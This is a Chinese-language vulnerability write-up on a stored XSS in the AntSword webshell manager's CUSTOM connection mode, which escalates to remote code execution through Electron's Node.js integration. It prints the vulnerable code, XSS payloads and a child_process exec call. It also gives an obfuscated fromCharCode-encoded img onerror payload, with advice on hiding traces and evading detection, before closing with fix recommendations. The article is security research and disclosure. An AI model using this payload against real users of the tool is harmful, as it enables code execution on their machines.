蚁剑RCE漏洞分析与利用技术研究<\/h1>

前言<\/h2>
蚁剑(AntSword)是一款流行的开源Webshell管理工具，广泛应用于渗透测试和红队行动中。本文详细分析蚁剑在某些特定场景下存在的远程代码执行(RCE)漏洞，该漏洞源于蚁剑在自定义连接模式下对数据库查询结果未进行适当的HTML转义处理，导致XSS漏洞，进而可升级为RCE。<\/p>

漏洞发现过程<\/h2>

在项目实践中发现，当使用蚁剑连接JSP webshell并执行数据库查询时，数据库中的HTML内容被浏览器解析执行。初步怀疑是JSP webshell编写不严谨导致，但进一步研究发现蚁剑自身的过滤机制存在问题。<\/p>

测试环境搭建：<\/p>

本地PHP环境测试：在数据库中插入XSS payload "><\/code>，未触发XSS<\/li>

Tomcat+Mysql环境测试：相同payload成功触发弹窗<\/li>
<\/ol>
这表明漏洞触发需要特定环境条件，特别是使用蚁剑的CUSTOM类型连接方式时。<\/p>
技术原理分析<\/h2>
蚁剑处理机制<\/h3>
蚁剑对于不同语言类型的webshell采用不同的处理方式：<\/p>

PHP模式：对返回数据进行了防XSS处理<\/li>
CUSTOM模式(JSP\/ASP\/ASPX)：未对返回数据进行转义处理<\/li>
<\/ul>
关键代码分析（index.js中的updateResult函数）：<\/p>
updateResult<\/span>(data<\/span>) {
<\/span><\/span>    const<\/span> arr<\/span> =<\/span> data<\/span>.split<\/span>('\n'<\/span>);
<\/span><\/span>    if<\/span> (arr<\/span>.length<\/span> <<\/span> 2<\/span>) return<\/span>;
<\/span><\/span>    let<\/span> header_arr<\/span> =<\/span> antSword<\/span>.noxss<\/span>(arr<\/span>[0<\/span>]).replace<\/span>(\/,\/g<\/span>, ','<\/span>).split<\/span>('\t|\t'<\/span>);
<\/span><\/span>    \/\/ ...省略中间处理逻辑...
<\/span><\/span><\/span><\/span>    let<\/span> data_arr<\/span> =<\/span> [];
<\/span><\/span>    arr<\/span>.map<\/span>((_<\/span>) => {
<\/span><\/span>      let<\/span> _data<\/span> =<\/span> _<\/span>.split<\/span>('\t|\t'<\/span>);
<\/span><\/span>      data_arr<\/span>.push<\/span>(_data<\/span>);  \/\/ 直接推送未过滤的数据
<\/span><\/span><\/span><\/span>    });
<\/span><\/span>    \/\/ ...省略表格渲染代码...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>对比PHP模式下的处理：<\/p>
let<\/span> text<\/span> =<\/span> Decodes<\/span>.decode<\/span>(buff<\/span>, encoding<\/span>);
<\/span><\/span>_data<\/span>[i<\/span>] =<\/span> antSword<\/span>.noxss<\/span>(text<\/span>, false<\/span>);  \/\/ 进行了XSS防护
<\/span><\/span><\/span><\/code><\/pre>漏洞影响范围<\/h3>
经测试确认以下环境受影响：<\/p>

JSP webshell + MySQL数据库<\/li>
ASP\/ASPX webshell + ODBC连接方式<\/li>
<\/ol>
漏洞利用技术<\/h2>
基本XSS利用<\/h3>
在数据库字段中插入简单XSS payload即可触发：<\/p>
">
<\/span><\/span><\/code><\/pre>升级为RCE<\/h3>
由于蚁剑使用Electron框架开发并开启了nodeIntegration，可通过Node.js的child_process模块执行系统命令：<\/p>
require<\/span>('child_process'<\/span>).exec<\/span>('calc.exe'<\/span>)
<\/span><\/span><\/code><\/pre>高级利用技巧<\/h3>


Payload设计考虑<\/strong>：<\/p>

避免使用单\/双引号，防止HTML语法混乱<\/li>
执行后自动删除当前HTML节点，隐藏攻击痕迹<\/li>
对流量进行加密，避免被检测<\/li>
<\/ul>
<\/li>

完整攻击Payload<\/strong>：<\/p>
<\/li>
<\/ol>
<img<\/span> src<\/span>=<\/span>1<\/span> onerror<\/span>=<\/span>"eval(String.fromCharCode(118,97,114,32,95,48,120,52,52,100,99,61,91,39,102,114,111,109,67,104,97,114,67,111,100,101,39,44,39,101,120,112,111,114,116,115,39,44,39,108,101,110,103,104,116,39,44,39,101,120,101,99,39,44,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,44,39,116,111,83,116,114,105,110,103,39,93,59,40,102,117,110,99,116,105,111,110,40,95,48,120,51,102,48,49,56,53,44,95,48,120,52,52,100,99,102,50,41,123,118,97,114,32,95,48,120,51,49,49,98,56,55,61,102,117,110,99,116,105,111,110,40,95,48,120,49,57,102,102,55,100,41,123,119,104,105,108,101,40,45,45,95,48,120,49,57,102,102,55,100,41,123,95,48,120,51,102,48,49,56,53,91,39,112,117,115,104,39,93,40,95,48,120,51,102,48,49,56,53,91,39,115,104,105,102,116,39,93,40,41,41,59,125,125,59,95,48,120,51,49,49,98,56,55,40,43,43,95,48,120,52,52,100,99,102,50,41,59,125,40,95,48,120,52,52,100,99,44,48,120,49,54,99,41,41,59,118,97,114,32,95,48,120,51,49,49,98,61,102,117,110,99,116,105,111,110,40,95,48,120,51,102,48,49,56,53,44,95,48,120,52,52,100,99,102,50,41,123,95,48,120,51,102,48,49,56,53,61,95,48,120,51,102,48,49,56,53,45,48,120,48,59,118,97,114,32,95,48,120,51,49,49,98,56,55,61,95,48,120,52,52,100,99,91,95,48,120,51,102,48,49,56,53,93,59,114,101,116,117,114,110,32,95,48,120,51,49,49,98,56,55,59,125,59,118,97,114,32,101,120,101,99,61,114,101,113,117,105,114,101,40,95,48,120,51,49,49,98,40,39,48,120,48,39,41,41,91,95,48,120,51,49,49,98,40,39,48,120,53,39,41,93,59,109,111,100,117,108,101,91,95,48,120,51,49,49,98,40,39,48,120,51,39,41,93,61,102,117,110,99,116,105,111,110,32,120,40,41,123,114,101,116,117,114,110,32,110,101,119,32,80,114,111,109,105,115,101,40,102,117,110,99,116,105,111,110,40,95,48,120,54,56,57,53,48,57,44,95,48,120,52,52,52,98,53,98,41,123,118,97,114,32,95,48,120,52,55,52,55,51,50,61,83,116,114,105,110,103,91,95,48,120,51,49,49,98,40,39,48,120,50,39,41,93,40,48,120,54,51,44,48,120,54,49,44,48,120,54,99,44,48,120,54,51,44,48,120,50,101,44,48,120,54,53,44,48,120,55,56,44,48,120,54,53,41,59,101,120,101,99,40,95,48,120,52,55,52,55,51,50,44,123,39,109,97,120,66,117,102,102,101,114,39,58,48,120,52,48,48,42,48,120,55,100,48,125,44,102,117,110,99,116,105,111,110,40,95,48,120,53,54,98,98,100,53,44,95,48,120,52,48,49,57,52,51,44,95,48,120,50,50,51,48,51,51,41,123,105,102,40,95,48,120,53,54,98,98,100,53,41,95,48,120,52,52,52,98,53,98,40,95,48,120,53,54,98,98,100,53,41,59,101,108,115,101,32,95,48,120,50,50,51,48,51,51,91,95,48,120,51,49,49,98,40,39,48,120,52,39,41,93,62,48,120,48,63,95,48,120,52,52,52,98,53,98,40,110,101,119,32,69,114,114,111,114,40,95,48,120,50,50,51,48,51,51,91,95,48,120,51,49,49,98,40,39,48,120,49,39,41,93,40,41,41,41,58,95,48,120,54,56,57,53,48,57,40,41,59,125,41,59,125,41,59,125,44,109,111,100,117,108,101,91,95,48,120,51,49,49,98,40,39,48,120,51,39,41,93,40,41,59));this.parentNode.parentNode.removeChild(this.parentNode);"<\/span> style<\/span>=<\/span>"display:none;"<\/span>\/>
<\/span><\/span><\/code><\/pre>该payload经过混淆和编码，执行后会：<\/p>

调用child_process.exec执行calc.exe<\/li>
自动移除自身DOM节点<\/li>
使用String.fromCharCode解码执行核心代码<\/li>
<\/ol>
漏洞修复方案<\/h2>
蚁剑在后续版本(2.1.8+)中已修复此问题，主要改进包括：<\/p>

对所有模式下的返回数据都进行了全局转义处理<\/li>
增加了noxss过滤机制<\/li>
<\/ol>
建议用户：<\/p>

升级到最新版蚁剑<\/li>
在自定义webshell中自行添加输出过滤<\/li>
避免在数据库中存储不可信HTML内容<\/li>
<\/ol>
总结<\/h2>
该漏洞展示了Webshell管理工具自身可能成为攻击向量的典型案例，强调了：<\/p>

客户端安全同样重要<\/li>
数据渲染前的净化处理必不可少<\/li>
安全工具自身也需要严格的安全审计<\/li>
<\/ol>
此研究为Webshell管理工具的安全设计提供了重要参考，也提醒安全从业者在使用工具时保持警惕，及时更新到安全版本。<\/p>